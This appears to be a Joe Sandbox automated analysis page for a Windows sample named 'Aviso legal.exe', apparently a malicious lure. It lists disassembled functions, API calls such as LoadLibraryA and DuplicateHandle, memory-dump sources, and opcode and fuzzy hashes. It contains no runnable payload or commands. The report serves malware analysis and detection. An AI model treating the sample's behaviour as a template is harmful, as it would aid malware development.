Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75E03420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
GlobalFree.KERNEL32(?), ref: 00403B78

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC

Function 00405E58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Aviso legal.exe,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Aviso legal.exe,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003), ref: 00405E6E

Strings

C:\Users\user\Desktop, xrefs: 00405E58

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Analysis Process: Aviso legal.exePID: 6196, Parent PID: 8552COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	155
Total number of Limit Nodes:	15

Executed Functions

Function 3611CCC0 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$!r, xrefs: 3611D418
$!r, xrefs: 3611D3E8
$!r, xrefs: 3611D3CB
$!r, xrefs: 3611D3BF
$!r, xrefs: 3611D40C
$!r, xrefs: 3611D3F4

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID: $!r$$!r$$!r$$!r$$!r$$!r
API String ID: 0-3478522173
Opcode ID: aec2df89575fd50655b1173f54fa24f11d330e7d087196f1822899fc4fd8614e
Instruction ID: f9bc58b2d368b03253166720707854306c452391bf7cdf7a8a76543590e7ceab
Opcode Fuzzy Hash: aec2df89575fd50655b1173f54fa24f11d330e7d087196f1822899fc4fd8614e
Instruction Fuzzy Hash: 40324031E10719CBDB14DF69C89459DB7B2BFC9300F6086AAD409A7254EF70AD85CF91

Function 36113EE8 Relevance: 2.9, Instructions: 2857COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88cb405691ca1ec4741c25a9889ec11eb505894ad95ccb27b6778701dc5b571e
Instruction ID: c1d6b6e091afce9e4e19bbd159794793c2c63e870c365144acbb0a248084b858
Opcode Fuzzy Hash: 88cb405691ca1ec4741c25a9889ec11eb505894ad95ccb27b6778701dc5b571e
Instruction Fuzzy Hash: 1E63D631D10B1A8ADB11EF68C894699F7B1FF99300F11D79AE45877221FB70AAD4CB81

Function 361149D2 Relevance: 1.7, Instructions: 1666COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b10e210caa92e94ff386f694be41137d7b79b5571e5f58672455625114b427
Instruction ID: 5c02d6961ccc7bcde4439d18fa3a3edaa61a7e524d300859dc5a62e3355d2d0d
Opcode Fuzzy Hash: 05b10e210caa92e94ff386f694be41137d7b79b5571e5f58672455625114b427
Instruction Fuzzy Hash: 8B03C731D20B1A8ADB11EF68C894699F7B1FF99300F51D79AE05877121FB70AAD4CB81

Function 3611EE00 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f932e6a5170fc1bb8aa0050b5019f8135125e2b3351b93e0a2f792acb1eea93f
Instruction ID: a0a3c62642ab9bf50f424330126e189d8410e49575a9f93d4b81fad7f9644f63
Opcode Fuzzy Hash: f932e6a5170fc1bb8aa0050b5019f8135125e2b3351b93e0a2f792acb1eea93f
Instruction Fuzzy Hash: 70A10679E042158FEB308BA9D88075EFBF2EB45350F24857AE469DB282C731DD41CB91

Function 3611AD70 Relevance: 6.6, Strings: 5, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D@, xrefs: 3611B03D
D@, xrefs: 3611B07C
D@, xrefs: 3611AEAB
D@, xrefs: 3611AF29
D@, xrefs: 3611AEEA

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID: D@$D@$D@$D@$D@
API String ID: 0-3094064158
Opcode ID: 47d585595c57cac8bda507258c63c5b0fb38e9f29da4b0576a987a4022c37869
Instruction ID: 28105aaab0a0a33891a4f357b45b810b5bb789e8c58a4c7adcf9bf19202bcfba
Opcode Fuzzy Hash: 47d585595c57cac8bda507258c63c5b0fb38e9f29da4b0576a987a4022c37869
Instruction Fuzzy Hash: 01D1A074E002199FEF10DFA9C880B9EBBB6EF89310F208569E509EB291D775DD41CB91

Function 3930CC28 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3930CCB6
GetCurrentThread.KERNEL32 ref: 3930CCF3
GetCurrentProcess.KERNEL32 ref: 3930CD30
GetCurrentThreadId.KERNEL32 ref: 3930CD89

Memory Dump Source

Source File: 0000000A.00000002.6071785187.0000000039300000.00000040.00000800.00020000.00000000.sdmp, Offset: 39300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_39300000_Aviso legal.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 97dd5d91e2c91a81d3bf6e8c55410725008247fc1813d92050526c6a4034c140
Instruction ID: af92b8b4be4c46b466c1037424b328e6ff88ebe8ad5752f9bf6e00263b92997c
Opcode Fuzzy Hash: 97dd5d91e2c91a81d3bf6e8c55410725008247fc1813d92050526c6a4034c140
Instruction Fuzzy Hash: B9516AB49016498FDB40CFAAC544BEEBBF1BF88300F20845AE40AB73A0D7749981CF65

Function 3930CC38 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3930CCB6
GetCurrentThread.KERNEL32 ref: 3930CCF3
GetCurrentProcess.KERNEL32 ref: 3930CD30
GetCurrentThreadId.KERNEL32 ref: 3930CD89

Memory Dump Source

Source File: 0000000A.00000002.6071785187.0000000039300000.00000040.00000800.00020000.00000000.sdmp, Offset: 39300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_39300000_Aviso legal.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9fb80f7ff2758193b034c5d74fffb9b39e3c3fe879f5d5dd390299d731f2ea1b
Instruction ID: a363c28ab9b809b7545f741fddea73976b1d1508b4c8c5133c06a9cc6d5697cf
Opcode Fuzzy Hash: 9fb80f7ff2758193b034c5d74fffb9b39e3c3fe879f5d5dd390299d731f2ea1b
Instruction Fuzzy Hash: F75149B49016498FDB40DFAAC544B9EBBF5FF48310F20845AE40AB7390D7749985CF65

Function 3611E3C8 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XP&r, xrefs: 3611E519
\O&r, xrefs: 3611E5A3
f&r, xrefs: 3611E3F3

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID: f&r$XP&r$\O&r
API String ID: 0-1621091023
Opcode ID: b94452b282981d1a5b12989cb68af081f394dd9439655259a3241536701c9ebe
Instruction ID: 453f578dddebace762f8c6b089a7bcc935ca3845ef53d3ef5123649946afff46
Opcode Fuzzy Hash: b94452b282981d1a5b12989cb68af081f394dd9439655259a3241536701c9ebe
Instruction Fuzzy Hash: 33616230F002189FEB649BE8C8557AEBBF6EB88300F20852AE105EB395DB749D45CF51

Function 395D82BC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 395D9B51

Strings

d{[9, xrefs: 395D82BC

Memory Dump Source

Source File: 0000000A.00000002.6071955437.00000000395D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 395D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_395d0000_Aviso legal.jbxd

Similarity

API ID: CallProcWindow
String ID: d{[9
API String ID: 2714655100-3421385838
Opcode ID: 407b150656dd578ed9d891c3f96e78b57363594548c42a309c362b8184987041
Instruction ID: d4746a54ec8b0e9d8b303dedacd6e41db93aea9c121c36864f62434bd8cbc938
Opcode Fuzzy Hash: 407b150656dd578ed9d891c3f96e78b57363594548c42a309c362b8184987041
Instruction Fuzzy Hash: B1412AB8A05305DFDB00CF99C484AAABBF5FF89310F258459D519AB361D770A881CFA0

Function 3611E3B8 Relevance: 2.6, Strings: 2, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XP&r, xrefs: 3611E519
f&r, xrefs: 3611E3F3

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID: f&r$XP&r
API String ID: 0-3010104400
Opcode ID: 1b290fc901053b92de6786d840ad64ba00835f1bc720176a568b273353eb9f23
Instruction ID: 49d3257e9ab896522ef30998f430ccdd9a1fdc55a5d2a3feda940cd8bc45a113
Opcode Fuzzy Hash: 1b290fc901053b92de6786d840ad64ba00835f1bc720176a568b273353eb9f23
Instruction Fuzzy Hash: 4B517370F102089FEB54DFA8C455B9EBBF6EFC8700F20852AE105EB395DA749D418B90

Function 3611B28F Relevance: 2.6, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D@, xrefs: 3611B3B7
nK9r, xrefs: 3611B298

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID: D@$nK9r
API String ID: 0-245216030
Opcode ID: 53d1cb2f42b1c5525e6ed00b4971b663e69669d7360823e734a722e465b4f4de
Instruction ID: 2df28710c384701b26a384c3daef98bf13fb3d6ed8683ec2e0fcfcb3d43c6459
Opcode Fuzzy Hash: 53d1cb2f42b1c5525e6ed00b4971b663e69669d7360823e734a722e465b4f4de
Instruction Fuzzy Hash: 7E31B334B142415FEB159BA4C850BAFBBB2EB89350F20882AD546DB2D1CB39DD528785

Function 361118A8 Relevance: 1.8, Strings: 1, Instructions: 559COMMON

Download Yara Rule

Strings

N,6, xrefs: 36111C16

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID: N,6
API String ID: 0-2815451019
Opcode ID: d2986fcdd33717d27fb1577bc7f4613bea3522391ff6f75d1882318c11227b52
Instruction ID: 7d09a6a3b2a3c72787a2e0998dbbce1dbd9ee843ed686f9ce2b0a52ad48ff226
Opcode Fuzzy Hash: d2986fcdd33717d27fb1577bc7f4613bea3522391ff6f75d1882318c11227b52
Instruction Fuzzy Hash: 56125A307102029BDB55AB38C86B25A7BE2EBC9764F604939E005EB391CF75EC57DB81

Function 395D71F2 Relevance: 1.8, APIs: 1, Instructions: 277COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 395D7462

Memory Dump Source

Source File: 0000000A.00000002.6071955437.00000000395D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 395D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_395d0000_Aviso legal.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9fd67b4b02641e8d99646ac5914d3be519bdd12ece006d7b453acc1dd44e2b8b
Instruction ID: 93db5d2ab7c5d22d8a930e995cc51fafdee6e457d60701e5fdf5b7793adc5f99
Opcode Fuzzy Hash: 9fd67b4b02641e8d99646ac5914d3be519bdd12ece006d7b453acc1dd44e2b8b
Instruction Fuzzy Hash: 72A16DB0809389DFDB12CFA9C8905DDBFB1FF4A310F5581AAE844AB262C7759885CF51

Function 395D7350 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 395D7462

Memory Dump Source

Source File: 0000000A.00000002.6071955437.00000000395D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 395D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_395d0000_Aviso legal.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1399191d834b0f312b37d84b7830432653fe7c151cc848db4d68b13c49cdecfe
Instruction ID: d75725902fd195ffd1fd82938abd934c79b346c384e9877dae934c7fb1a2f2a3
Opcode Fuzzy Hash: 1399191d834b0f312b37d84b7830432653fe7c151cc848db4d68b13c49cdecfe
Instruction Fuzzy Hash: DC41C3B5D003499FDB15CF99C884ADEBFB5BF48350F60852AE418AB250D771A985CF90

Function 00168004 Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 001680F7

Memory Dump Source

Source File: 0000000A.00000002.6044305915.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_160000_Aviso legal.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cd066097bbec6c3575502e6fcd9c32133e09621cd5e3dc73200db927fba2fe21
Instruction ID: 50071899eca321ea273fc77d2bf5f58b27e3f3bbc7bf5a30b8879297ac5859ba
Opcode Fuzzy Hash: cd066097bbec6c3575502e6fcd9c32133e09621cd5e3dc73200db927fba2fe21
Instruction Fuzzy Hash: E44169B0D006498FDB10CFA9C88579EFBF1EF48300F14862AE855A7385DB759886CF91

Function 00164E34 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 001680F7

Memory Dump Source

Source File: 0000000A.00000002.6044305915.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_160000_Aviso legal.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: eee96187942f5d1be38a47bc2494bcb2becd480ae0f3f3fb1d8ae75daccf43e3
Instruction ID: a54b3acf099c4ef304591edc758ee3bc59d31c5aab398bb59663663444b8cd19
Opcode Fuzzy Hash: eee96187942f5d1be38a47bc2494bcb2becd480ae0f3f3fb1d8ae75daccf43e3
Instruction Fuzzy Hash: CF4157B0D006488FDB10CFA9C88579EFBF1EB48304F148629E815AB385DB759855CF91

Function 3930CE78 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3930CF07

Memory Dump Source

Source File: 0000000A.00000002.6071785187.0000000039300000.00000040.00000800.00020000.00000000.sdmp, Offset: 39300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_39300000_Aviso legal.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
